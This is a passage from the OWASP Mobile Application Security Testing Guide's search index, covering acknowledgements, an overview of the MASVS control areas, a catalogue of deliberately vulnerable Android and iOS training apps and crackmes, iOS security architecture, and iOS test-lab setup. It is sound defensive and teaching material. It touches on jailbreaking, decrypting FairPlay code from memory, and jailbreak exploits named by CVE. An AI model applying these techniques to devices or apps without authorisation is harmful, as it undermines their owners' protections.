"},{"location":"MASTG/Intro/0x02c-Acknowledgements/","title":"Acknowledgments","text":""},{"location":"MASTG/Intro/0x02c-Acknowledgements/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"MAS Advocates are industry supporters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to push the project forward by providing consistent high-impact contributions and continuously spreading the word.
\ud83e\udd47 Being a \"MAS Advocate\" is the highest status that companies can achieve in the project, acknowledging that they've gone above and beyond to support the project.
MAS Advocates continuously support the project with time/dedicated resources with clear/high impact. To achieve this status, you'll need to demonstrate that you make consistent high-impact contributions to the project. For example:
The following will be considered but it's not a requirement:
If you'd like to apply please contact the project leaders by sending an email to Sven Schleier and Carlos Holguera who will validate your application and provide you with a contribution report. Please be sure to include sufficient evidence (e.g including links to PRs) showing what you've done in the 6 months period that goes inline with the three categories described above:
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. MAS Advocates do not influence the content of the MASVS or MASTG in any way.
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#our-mas-advocates","title":"Our MAS Advocates","text":"NowSecure has provided consistent high-impact contributions to the project and has successfully helped spread the word.
We'd like to thank NowSecure for its exemplary contribution which sets a blueprint for other potential contributors wanting to push the project forward.
"},{"location":"MASTG/Intro/0x02c-Acknowledgements/#nowsecures-contributions-to-the-mas-project","title":"NowSecure's Contributions to the MAS Project","text":"High-impact Contributions (time/dedicated resources):
A special mention goes for the contribution to the MASVS Refactoring:
In the past, NowSecure has also contributed to the project, has sponsored it becoming a \"God Mode Sponsor\" and has donated the UnCrackable App for Android Level 4: Radare2 Pay.
Additionally:
Showing Adoption:
Spreading the Word:
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on our OWASP Project page.
"},{"location":"MASTG/Intro/0x03-Overview/","title":"Introduction to the OWASP Mobile Application Security Project","text":"New technology always introduces new security risks, and security concerns for mobile apps differ from traditional desktop software in important ways. While modern mobile operating systems tend to be more secure than traditional desktop operating systems, problems can still appear if developers don't carefully consider security during mobile app development. These security risks often go beyond the usual concerns with data storage, inter-app communication, proper usage of cryptographic APIs, and secure network communication.
"},{"location":"MASTG/Intro/0x03-Overview/#how-to-use-the-mobile-application-security-project","title":"How to Use the Mobile Application Security Project","text":"First, the Project recommends that your mobile app security strategies should be based on the OWASP Mobile Application Security Verification Standard (MASVS), which defines a mobile app security model and lists generic security requirements for mobile apps. MASVS is designed to be used by architects, developers, testers, security professionals, and consumers to define and understand the qualities of a secure mobile app. After you have determined how OWASP MASVS applies to your mobile app's security model, the Project suggests that you use the OWASP Mobile Application Security Testing Guide (MASTG). The Testing Guide maps to the same basic set of security requirements offered by the MASVS and depending on the context, they can be used individually or combined to achieve different objectives.
For example, the MASVS requirements can be used in an app's planning and architecture design stages while the checklist and testing guide may serve as a baseline for manual security testing or as a template for automated security tests during or after development. In the \"Mobile App Security Testing\" chapter we'll describe how you can apply the checklist and MASTG to a mobile app penetration test.
"},{"location":"MASTG/Intro/0x03-Overview/#whats-covered-in-the-mobile-testing-guide","title":"What's Covered in the Mobile Testing Guide","text":"Throughout this guide, we will focus on apps for Android and iOS running on smartphones. These platforms are currently dominating the market and also run on other device classes including tablets, smartwatches, smart TVs, automotive infotainment units, and other embedded systems. Even if these additional device classes are out of scope, you can still apply most of the knowledge and testing techniques described in this guide with some deviance depending on the target device.
Given the vast amount of mobile app frameworks available it would be impossible to cover all of them exhaustively. Therefore, we focus on native apps on each operating system. However, the same techniques are also useful when dealing with web or hybrid apps (ultimately, no matter the framework, every app is based on native components).
"},{"location":"MASTG/Intro/0x03-Overview/#navigating-the-owasp-mastg","title":"Navigating the OWASP MASTG","text":"The MASTG contains descriptions of all requirements specified in the MASVS. The MASTG contains the following main sections:
The General Testing Guide contains a mobile app security testing methodology and general vulnerability analysis techniques as they apply to mobile app security. It also contains additional technical test cases that are OS-independent, such as authentication and session management, network communications, and cryptography.
The Android Testing Guide covers mobile security testing for the Android platform, including security basics, security test cases, reverse engineering techniques and prevention, and tampering techniques and prevention.
The iOS Testing Guide covers mobile security testing for the iOS platform, including an overview of the iOS OS, security testing, reverse engineering techniques and prevention, and tampering techniques and prevention.
Many mobile app penetration testers have a background in network and web app penetration testing, a quality that is valuable for mobile app testing. Almost every mobile app talks to a backend service, and those services are prone to the same types of attacks we are familiar with in web apps on desktop machines. Mobile apps have a smaller attack surface and therefore have more security against injection and similar attacks. Instead, the MASTG prioritizes data protection on the device and the network to increase mobile security.
"},{"location":"MASTG/Intro/0x03-Overview/#owasp-masvs-overview-key-areas-in-mobile-application-security","title":"OWASP MASVS Overview: Key Areas in Mobile Application Security","text":"This overview discusses how the MASVS defines and describes the key areas of mobile security:
The Standard is based on the principle that protecting sensitive data, such as user credentials and private information, is crucial to mobile security. If an app does not use operating system APIs properly, especially those that handle local storage or inter-process communication (IPC), the app could expose sensitive data to other apps running on the same device or may unintentionally leak data to cloud storage, backups, or the keyboard cache. And since mobile devices are more likely to be or lost or stolen, attackers can actually gain physical access to the device, which would make it easier to retrieve the data.
Thus we must take extra care to protect stored user data in mobile apps. Some solutions may include appropriate key storage APIs and using hardware-backed security features (when available).
Fragmentation is a problem we deal with especially on Android devices. Not every Android device offers hardware-backed secure storage, and many devices are running outdated versions of Android. For an app to be supported on these out-of-date devices, it would have to be created using an older version of Android's API which may lack important security features. For maximum security, the best choice is to create apps with the current API version even though that excludes some users.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-crypto-cryptography","title":"MASVS-CRYPTO: Cryptography","text":"Cryptography is an essential ingredient when it comes to protecting data stored on a mobile device. It is also an area where things can go horribly wrong, especially when standard conventions are not followed. It is essential to ensure that the application uses cryptography according to industry best practices, including the use of proven cryptographic libraries, a proper choice and configuration of cryptographic primitives as well as a suitable random number generator wherever randomness is required.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-auth-authentication-and-authorization","title":"MASVS-AUTH: Authentication and Authorization","text":"In most cases, sending users to log in to a remote service is an integral part of the overall mobile app architecture. Even though most of the authentication and authorization logic happens at the endpoint, there are also some implementation challenges on the mobile app side. Unlike web apps, mobile apps often store long-time session tokens that are unlocked with user-to-device authentication features such as fingerprint scanning. While this allows for a quicker login and better user experience (nobody likes to enter complex passwords), it also introduces additional complexity and room for error.
Mobile app architectures also increasingly incorporate authorization frameworks (such as OAuth2) that delegate authentication to a separate service or outsource the authentication process to an authentication provider. Using OAuth2 allows the client-side authentication logic to be outsourced to other apps on the same device (e.g. the system browser). Security testers must know the advantages and disadvantages of different possible authorization frameworks and architectures.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-network-network-communication","title":"MASVS-NETWORK: Network Communication","text":"Mobile devices regularly connect to a variety of networks, including public Wi-Fi networks shared with other (potentially malicious) clients. This creates opportunities for a wide variety of network-based attacks ranging from simple to complicated and old to new. It's crucial to maintain the confidentiality and integrity of information exchanged between the mobile app and remote service endpoints. As a basic requirement, mobile apps must set up a secure, encrypted channel for network communication using the TLS protocol with appropriate settings.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-platform-interaction-with-the-mobile-platform","title":"MASVS-PLATFORM: Interaction with the Mobile Platform","text":"Mobile operating system architectures differ from classical desktop architectures in important ways. For example, all mobile operating systems implement app permission systems that regulate access to specific APIs. They also offer more (Android) or less rich (iOS) inter-process communication (IPC) facilities that enable apps to exchange signals and data. These platform-specific features come with their own set of pitfalls. For example, if IPC APIs are misused, sensitive data or functionality might be unintentionally exposed to other apps running on the device.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-code-code-quality-and-exploit-mitigation","title":"MASVS-CODE: Code Quality and Exploit Mitigation","text":"Traditional injection and memory management issues aren't often seen in mobile apps due to the smaller attack surface. Mobile apps mostly interact with the trusted backend service and the UI, so even if many buffer overflow vulnerabilities exist in the app, those vulnerabilities usually don't open up any useful attack vectors. The same applies to browser exploits such as cross-site scripting (XSS allows attackers to inject scripts into web pages) that are very prevalent in web apps. However, there are always exceptions. XSS is theoretically possible on mobile in some cases, but it's very rare to see XSS issues that an individual can exploit.
This protection from injection and memory management issues doesn't mean that app developers can get away with writing sloppy code. Following security best practices results in hardened (secure) release builds that are resilient against tampering. Free security features offered by compilers and mobile SDKs help increase security and mitigate attacks.
"},{"location":"MASTG/Intro/0x03-Overview/#masvs-resilience-anti-tampering-and-anti-reversing","title":"MASVS-RESILIENCE: Anti-Tampering and Anti-Reversing","text":"There are three things you should never bring up in polite conversations: religion, politics, and code obfuscation. Many security experts dismiss client-side protections outright. However, software protection controls are widely used in the mobile app world, so security testers need ways to deal with these protections. We believe there's a benefit to client-side protections if they are employed with a clear purpose and realistic expectations in mind and aren't used to replace security controls.
"},{"location":"MASTG/Intro/0x09-Suggested-Reading/","title":"Suggested Reading","text":""},{"location":"MASTG/Intro/0x09-Suggested-Reading/#mobile-app-security","title":"Mobile App Security","text":""},{"location":"MASTG/Intro/0x09-Suggested-Reading/#android","title":"Android","text":"The applications listed below can be used as training materials. Note: only the MASTG apps and Crackmes are tested and maintained by the MAS project.
"},{"location":"MASTG/apps/#android-apps","title":"Android Apps","text":"ID Name Platform MASTG-APP-0002 Android License Validator android MASTG-APP-0009 DVHMA android MASTG-APP-0011 MASTG Hacking Playground (Java) android MASTG-APP-0007 DIVA Android android MASTG-APP-0008 DodoVulnerableBank android MASTG-APP-0004 Android UnCrackable L2 android MASTG-APP-0003 Android UnCrackable L1 android MASTG-APP-0013 OVAA android MASTG-APP-0010 InsecureBankv2 android MASTG-APP-0012 MASTG Hacking Playground (Kotlin) android MASTG-APP-0006 Digitalbank android MASTG-APP-0005 Android UnCrackable L3 android MASTG-APP-0001 AndroGoat android MASTG-APP-0015 Android UnCrackable L4 android MASTG-APP-0014 InsecureShop android"},{"location":"MASTG/apps/#ios-apps","title":"Ios Apps","text":"ID Name Platform MASTG-APP-0026 iOS UnCrackable L2 ios MASTG-APP-0024 DVIA-v2 ios MASTG-APP-0023 DVIA ios MASTG-APP-0025 iOS UnCrackable L1 ios"},{"location":"MASTG/apps/android/MASTG-APP-0001/","title":"AndroGoat","text":"An open source vulnerable/insecure app using Kotlin. This app has a wide range of vulnerabilities related to certificate pinning, custom URL schemes, Android Network Security Configuration, WebViews, root detection and over 20 other vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0002/","title":"Android License Validator","text":"The Android License Validator is a crackme that implements a key validation function in native code, packaged as a standalone ELF executable for Android devices. Analyzing native code is often more challenging than Java, which is why critical business logic is frequently written this way.
While this sample application may not represent a real-world scenario, it serves as a valuable learning tool to grasp the basics of symbolic execution. These insights can be applied in practical situations, especially when dealing with Android apps that include obfuscated native libraries. In fact, obfuscated code is often put into native libraries specifically to make the process of de-obfuscation more challenging.
By Bernhard Mueller
"},{"location":"MASTG/apps/android/MASTG-APP-0003/","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller
"},{"location":"MASTG/apps/android/MASTG-APP-0004/","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"MASTG/apps/android/MASTG-APP-0005/","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"MASTG/apps/android/MASTG-APP-0006/","title":"Digitalbank","text":"A vulnerable app created in 2015, which can be used on older Android platforms.
"},{"location":"MASTG/apps/android/MASTG-APP-0007/","title":"DIVA Android","text":"An app intentionally designed to be insecure which has received updates in 2016 and contains 13 different challenges.
"},{"location":"MASTG/apps/android/MASTG-APP-0008/","title":"DodoVulnerableBank","text":"An insecure Android app from 2015.
"},{"location":"MASTG/apps/android/MASTG-APP-0009/","title":"DVHMA","text":"A hybrid mobile app (for Android) that intentionally contains vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0010/","title":"InsecureBankv2","text":"A vulnerable Android app made for security enthusiasts and developers to learn the Android insecurities by testing a vulnerable application. It has been updated in 2018 and contains a lot of vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0011/","title":"MASTG Hacking Playground (Java)","text":"A vulnerable Android app by the OWASP MAS project. See included vulnerabilities in here.
"},{"location":"MASTG/apps/android/MASTG-APP-0012/","title":"MASTG Hacking Playground (Kotlin)","text":"A vulnerable Android app by the OWASP MAS project.
"},{"location":"MASTG/apps/android/MASTG-APP-0013/","title":"OVAA","text":"An Android app that aggregates all the platform's known and popular security vulnerabilities.
"},{"location":"MASTG/apps/android/MASTG-APP-0014/","title":"InsecureShop","text":"InsecureShop is an intentionally designed Android application that showcases vulnerabilities, aiming to educate developers and security experts about common pitfalls within modern Android apps. It serves as a dynamic platform for refining Android pentesting skills.
The majority of these vulnerabilities can be exploited on non-rooted devices, posing risks from both remote users and malicious third-party applications. Notably, the app doesn't utilize any APIs. InsecureShop presents an opportunity to explore a range of vulnerabilities:
Complementing these learning experiences, InsecureShop provides documentation about the implemented vulnerabilities and their associated code. This documentation, however, refrains from offering complete solutions for each vulnerability showcased within the InsecureShop app.
"},{"location":"MASTG/apps/android/MASTG-APP-0015/","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed with its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"MASTG/apps/ios/MASTG-APP-0023/","title":"DVIA","text":"A vulnerable iOS app written in Objective-C which provides a platform to mobile security enthusiasts/professionals or students to test their iOS penetration testing skills.
"},{"location":"MASTG/apps/ios/MASTG-APP-0024/","title":"DVIA-v2","text":"A vulnerable iOS app, written in Swift with over 15 vulnerabilities.
"},{"location":"MASTG/apps/ios/MASTG-APP-0025/","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
By Bernhard Mueller
"},{"location":"MASTG/apps/ios/MASTG-APP-0026/","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
By Bernhard Mueller
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/","title":"iOS Platform Overview","text":"iOS is a mobile operating system that powers Apple mobile devices, including the iPhone, iPad, and iPod Touch. It is also the basis for Apple tvOS, which inherits many functionalities from iOS. This section introduces the iOS platform from an architecture point of view. The following five key areas are discussed:
Like the Apple desktop operating system macOS (formerly OS X), iOS is based on Darwin, an open source Unix operating system developed by Apple. Darwin's kernel is XNU (\"X is Not Unix\"), a hybrid kernel that combines components of the Mach and FreeBSD kernels.
However, iOS apps run in a more restricted environment than their desktop counterparts do. iOS apps are isolated from each other at the file system level and are significantly limited in terms of system API access.
To protect users from malicious applications, Apple restricts and controls access to the apps that are allowed to run on iOS devices. Apple's App Store is the only official application distribution platform. There developers can offer their apps and consumers can buy, download, and install apps. This distribution style differs from Android, which supports several app stores and sideloading (installing an app on your iOS device without using the official App Store). In iOS, sideloading typically refers to the app installation method via USB, although there are other enterprise iOS app distribution methods that do not use the App Store under the Apple Developer Enterprise Program.
In the past, sideloading was possible only with a jailbreak or complicated workarounds. With iOS 9 or higher, it is possible to sideload via Xcode.
iOS apps are isolated from each other via Apple's iOS sandbox (historically called Seatbelt), a mandatory access control (MAC) mechanism describing the resources an app can and can't access. Compared to Android's extensive Binder IPC facilities, iOS offers very few IPC (Inter Process Communication) options, minimizing the potential attack surface.
Uniform hardware and tight hardware/software integration create another security advantage. Every iOS device offers security features, such as secure boot, hardware-backed Keychain, and file system encryption (referred as data protection in iOS). iOS updates are usually quickly rolled out to a large percentage of users, decreasing the need to support older, unprotected iOS versions.
In spite of the numerous strengths of iOS, iOS app developers still need to worry about security. Data protection, Keychain, Touch ID/Face ID authentication, and network security still leave a large margin for errors. In the following chapters, we describe iOS security architecture, explain a basic security testing methodology, and provide reverse engineering how-tos.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#ios-security-architecture","title":"iOS Security Architecture","text":"The iOS security architecture, officially documented by Apple in the iOS Security Guide, consists of six core features. This security guide is updated by Apple for each major iOS version:
The iOS security architecture makes good use of hardware-based security features that enhance overall performance. Each iOS device comes with two built-in Advanced Encryption Standard (AES) 256-bit keys. The device\u2019s unique IDs (UIDs) and a device group IDs (GIDs) are AES 256-bit keys fused (UID) or compiled (GID) into the Application Processor (AP) and Secure Enclave Processor (SEP) during manufacturing. There's no direct way to read these keys with software or debugging interfaces such as JTAG. Encryption and decryption operations are performed by hardware AES crypto-engines that have exclusive access to these keys.
The GID is a value shared by all processors in a class of devices used to prevent tampering with firmware files and other cryptographic tasks not directly related to the user's private data. UIDs, which are unique to each device, are used to protect the key hierarchy that's used for device-level file system encryption. Because UIDs aren't recorded during manufacturing, not even Apple can restore the file encryption keys for a particular device.
To allow secure deletion of sensitive data on flash memory, iOS devices include a feature called Effaceable Storage. This feature provides direct low-level access to the storage technology, making it possible to securely erase selected blocks.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#secure-boot","title":"Secure Boot","text":"When an iOS device is powered on, it reads the initial instructions from the read-only memory known as Boot ROM, which bootstraps the system. The Boot ROM contains immutable code and the Apple Root CA, which is etched into the silicon chip during the fabrication process, thereby creating the root of trust. Next, the Boot ROM makes sure that the LLB's (Low Level Bootloader) signature is correct, and the LLB checks that the iBoot bootloader's signature is correct too. After the signature is validated, the iBoot checks the signature of the next boot stage, which is the iOS kernel. If any of these steps fail, the boot process will terminate immediately and the device will enter recovery mode and display the restore screen. However, if the Boot ROM fails to load, the device will enter a special low-level recovery mode called Device Firmware Upgrade (DFU). This is the last resort for restoring the device to its original state. In this mode, the device will show no sign of activity; i.e., its screen won't display anything.
This entire process is called the \"Secure Boot Chain\". Its purpose is focused on verifying the boot process integrity, ensuring that the system and its components are written and distributed by Apple. The Secure Boot chain consists of the kernel, the bootloader, the kernel extension, and the baseband firmware.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#code-signing","title":"Code Signing","text":"Apple has implemented an elaborate DRM system to make sure that only Apple-approved code runs on their devices, that is, code signed by Apple. In other words, you won't be able to run any code on an iOS device that hasn't been jailbroken unless Apple explicitly allows it. End users are supposed to install apps through the official Apple's App Store only. For this reason (and others), iOS has been compared to a crystal prison.
A developer profile and an Apple-signed certificate are required to deploy and run an application. Developers need to register with Apple, join the Apple Developer Program and pay a yearly subscription to get the full range of development and deployment possibilities. There's also a free developer account that allows you to compile and deploy apps (but not distribute them in the App Store) via sideloading.
According to the Archived Apple Developer Documentation the code signature consists of three parts:
Learn more:
FairPlay Code Encryption is applied to apps downloaded from the App Store. FairPlay was developed as a DRM when purchasing multimedia content. Originally, FairPlay encryption was applied to MPEG and QuickTime streams, but the same basic concepts can also be applied to executable files. The basic idea is as follows: Once you register a new Apple user account, or Apple ID, a public/private key pair will be created and assigned to your account. The private key is securely stored on your device. This means that FairPlay-encrypted code can be decrypted only on devices associated with your account. Reverse FairPlay encryption is usually obtained by running the app on the device, then dumping the decrypted code from memory (see also \"Basic Security Testing on iOS\").
Apple has built encryption into the hardware and firmware of its iOS devices since the release of the iPhone 3GS. Every device has a dedicated hardware-based cryptographic engine that provides an implementation of the AES 256-bit encryption and the SHA-1 hashing algorithms. In addition, there's a unique identifier (UID) built into each device's hardware with an AES 256-bit key fused into the Application Processor. This UID is unique and not recorded elsewhere. At the time of writing, neither software nor firmware can directly read the UID. Because the key is burned into the silicon chip, it can't be tampered with or bypassed. Only the crypto engine can access it.
Building encryption into the physical architecture makes it a default security feature that can encrypt all data stored on an iOS device. As a result, data protection is implemented at the software level and works with the hardware and firmware encryption to provide more security.
When data protection is enabled, by simply establishing a passcode in the mobile device, each data file is associated with a specific protection class. Each class supports a different level of accessibility and protects data on the basis of when the data needs to be accessed. The encryption and decryption operations associated with each class are based on multiple key mechanisms that utilize the device's UID and passcode, a class key, a file system key, and a per-file key. The per-file key is used to encrypt the file's contents. The class key is wrapped around the per-file key and stored in the file's metadata. The file system key is used to encrypt the metadata. The UID and passcode protect the class key. This operation is invisible to users. To enable data protection, the passcode must be used when accessing the device. The passcode unlocks the device. Combined with the UID, the passcode also creates iOS encryption keys that are more resistant to hacking and brute-force attacks. Enabling data protection is the main reason for users to use passcodes on their devices.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#sandbox","title":"Sandbox","text":"The appsandbox is an iOS access control technology. It is enforced at the kernel level. Its purpose is limiting system and user data damage that may occur when an app is compromised.
Sandboxing has been a core security feature since the first release of iOS. All third-party apps run under the same user (mobile
), and only a few system applications and services run as root
(or other specific system users). Regular iOS apps are confined to a container that restricts access to the app's own files and a very limited number of system APIs. Access to all resources (such as files, network sockets, IPCs, and shared memory) are controlled by the sandbox. These restrictions work as follows [#levin]:
mmap
and mmprotect
system calls are modified to prevent apps from making writable memory pages executable and stopping processes from executing dynamically generated code. In combination with code signing and FairPlay, this strictly limits what code can run under specific circumstances (e.g., all code in apps distributed via the App Store is approved by Apple).iOS implements address space layout randomization (ASLR) and eXecute Never (XN) bit to mitigate code execution attacks.
ASLR randomizes the memory location of the program's executable file, data, heap, and stack every time the program is executed. Because the shared libraries must be static to be accessed by multiple processes, the addresses of shared libraries are randomized every time the OS boots instead of every time the program is invoked. This makes specific function and library memory addresses hard to predict, thereby preventing attacks such as the return-to-libc attack, which involves the memory addresses of basic libc functions.
The XN mechanism allows iOS to mark selected memory segments of a process as non-executable. On iOS, the process stack and heap of user-mode processes is marked non-executable. Pages that are writable cannot be marked executable at the same time. This prevents attackers to execute machine code injected into the stack or heap.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#software-development-on-ios","title":"Software Development on iOS","text":"Like other platforms, Apple provides a Software Development Kit (SDK) that helps developers to develop, install, run, and test native iOS Apps. Xcode is an Integrated Development Environment (IDE) for Apple software development. iOS applications are developed in Objective-C or Swift.
Objective-C is an object-oriented programming language that adds Smalltalk-style messaging to the C programming language. It is used on macOS to develop desktop applications and on iOS to develop mobile applications. Swift is the successor of Objective-C and allows interoperability with Objective-C.
Swift was introduced with Xcode 6 in 2014.
On a non-jailbroken device, there are two ways to install an application out of the App Store:
iOS apps are distributed in IPA (iOS App Store Package) archives. The IPA file is a ZIP-compressed archive that contains all the code and resources required to execute the app.
IPA files have a built-in directory structure. The example below shows this structure at a high level:
/Payload/
folder contains all the application data. We will come back to the contents of this folder in more detail./Payload/Application.app
contains the application data itself (ARM-compiled code) and associated static resources./iTunesArtwork
is a 512x512 pixel PNG image used as the application's icon./iTunesMetadata.plist
contains various bits of information, including the developer's name and ID, the bundle identifier, copyright information, genre, the name of the app, release date, purchase date, etc./WatchKitSupport/WK
is an example of an extension bundle. This specific bundle contains the extension delegate and the controllers for managing the interfaces and responding to user interactions on an Apple Watch.Let's take a closer look at the different files in the IPA container. Apple uses a relatively flat structure with few extraneous directories to save disk space and simplify file access. The top-level bundle directory contains the application's executable file and all the resources the application uses (for example, the application icon, other images, and localized content .
A language.lproj folder exists for each language that the application supports. It contains a storyboard and strings file.
On a jailbroken device, you can recover the IPA for an installed iOS app using different tools that allow decrypting the main app binary and reconstruct the IPA file. Similarly, on a jailbroken device you can install the IPA file with IPA Installer. During mobile security assessments, developers often give you the IPA directly. They can send you the actual file or provide access to the development-specific distribution platform they use, e.g. TestFlight or Visual Studio App Center.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#app-permissions","title":"App Permissions","text":"In contrast to Android apps (before Android 6.0 (API level 23)), iOS apps don't have pre-assigned permissions. Instead, the user is asked to grant permission during runtime, when the app attempts to use a sensitive API for the first time. Apps that have been granted permissions are listed in the Settings > Privacy menu, allowing the user to modify the app-specific setting. Apple calls this permission concept privacy controls.
iOS developers can't set requested permissions directly, these will be requested indirectly when accessing sensitive APIs. For example, when accessing a user's contacts, any call to CNContactStore blocks the app while the user is being asked to grant or deny access. Starting with iOS 10.0, apps must include usage description keys for the types of permissions they request and data they need to access (e.g., NSContactsUsageDescription).
The following APIs require user permission:
The DeviceCheck framework, including its components DeviceCheck and App Attest, helps you prevent fraudulent use of your services. It consists of a framework that you use from your app and an Apple server which is accessible only to your own server. DeviceCheck allows you to persistently store information on the device and on Apple servers. The stored information remains intact across app reinstallation, device transfers, or resets, with the option to reset this data periodically.
DeviceCheck is typically used to mitigate fraud by restricting access to sensitive resources. For example, limiting promotions to once per device, identify and flag fraudulent devices, etc. However, it definitely cannot prevent all fraud. For example, it is not meant to detect compromised operating systems (aka. jailbreak detection).
For more information, refer to the DeviceCheck documentation.
"},{"location":"MASTG/iOS/0x06a-Platform-Overview/#app-attest","title":"App Attest","text":"App Attest, available under the DeviceCheck framework, helps you verify instances of the app running on a device by enabling apps to attach a hardware-backed assertion to requests, ensuring they originate from the legitimate app on a genuine Apple device. This feature aids in preventing modified apps from communicating with your server.
The process involves generating and validating cryptographic keys, along with a set of verifications performed by your server, ensuring the authenticity of the request. It is important to note that while App Attest enhances security, it does not guarantee complete protection against all forms of fraudulent activities.
For more detailed information, refer to the WWDC 2021 session, along with the App Attest documentation and App Attest implementation guide.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/","title":"iOS Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of iOS apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#ios-testing-setup","title":"iOS Testing Setup","text":"Although you can use a Linux or Windows host computer for testing, you'll find that many tasks are difficult or impossible on these platforms. In addition, the Xcode development environment and the iOS SDK are only available for macOS. This means that you'll definitely want to work on macOS for source code analysis and debugging (it also makes black box testing easier).
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#host-device","title":"Host Device","text":"The following is the most basic iOS app testing setup:
The UDID is a 40-digit unique sequence of letters and numbers to identify an iOS device. You can find the UDID of your iOS device on macOS Catalina onwards in the Finder app, as iTunes is not available anymore in Catalina. Open Finder and select the connected iOS device in the sidebar.
Click on the text containing the model, storage capacity, and battery information, and it will display the serial number, UDID, and model instead:
You can copy the UDID by right clicking on it.
It is also possible to get the UDID via various command line tools on macOS while the device is attached via USB:
By using the I/O Registry Explorer tool ioreg
:
$ ioreg -p IOUSB -l | grep \"USB Serial\"\n| \"USB Serial Number\" = \"9e8ada44246cee813e2f8c1407520bf2f84849ec\"\n
By using ideviceinstaller (also available on Linux):
$ brew install ideviceinstaller\n$ idevice_id -l\n316f01bd160932d2bf2f95f1f142bc29b1c62dbc\n
By using the system_profiler:
$ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p;/iPod/,/Serial/p' | grep \"Serial Number:\"\n2019-09-08 10:18:03.920 system_profiler[13251:1050356] SPUSBDevice: IOCreatePlugInInterfaceForService failed 0xe00002be\n Serial Number: 64655621de6ef5e56a874d63f1e1bdd14f7103b1\n
By using instruments:
instruments -s devices\n
You should have a jailbroken iPhone or iPad for running tests. These devices allow root access and tool installation, making the security testing process more straightforward. If you don't have access to a jailbroken device, you can apply the workarounds described later in this chapter, but be prepared for a more difficult experience.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#testing-on-the-ios-simulator","title":"Testing on the iOS Simulator","text":"Unlike the Android emulator, which fully emulates the hardware of an actual Android device, the iOS SDK simulator offers a higher-level simulation of an iOS device. Most importantly, emulator binaries are compiled to x86 code instead of ARM code. Apps compiled for a real device don't run, making the simulator useless for black box analysis and reverse engineering.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Corellium is the only publicly available iOS emulator. It is an enterprise SaaS solution with a per user license model and does not offer community licenses.
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"iOS jailbreaking is often compared to Android rooting, but the process is actually quite different. To explain the difference, we'll first review the concepts of \"rooting\" and \"flashing\" on Android.
su
binary on the system or replacing the whole system with a rooted custom ROM. Exploits aren't required to obtain root access as long as the bootloader is accessible.On iOS devices, flashing a custom ROM is impossible because the iOS bootloader only allows Apple-signed images to be booted and flashed. This is why even official iOS images can't be installed if they aren't signed by Apple, and it makes iOS downgrades only possible for as long as the previous iOS version is still signed.
The purpose of jailbreaking is to disable iOS protections (Apple's code signing mechanisms in particular) so that arbitrary unsigned code can run on the device (e.g. custom code or downloaded from alternative app stores such as Cydia or Sileo). The word \"jailbreak\" is a colloquial reference to all-in-one tools that automate the disabling process.
Developing a jailbreak for a given version of iOS is not easy. As a security tester, you'll most likely want to use publicly available jailbreak tools. Still, we recommend studying the techniques that have been used to jailbreak various versions of iOS-you'll encounter many interesting exploits and learn a lot about OS internals. For example, Pangu9 for iOS 9.x exploited at least five vulnerabilities, including a use-after-free kernel bug (CVE-2015-6794) and an arbitrary file system access vulnerability in the Photos app (CVE-2015-7037).
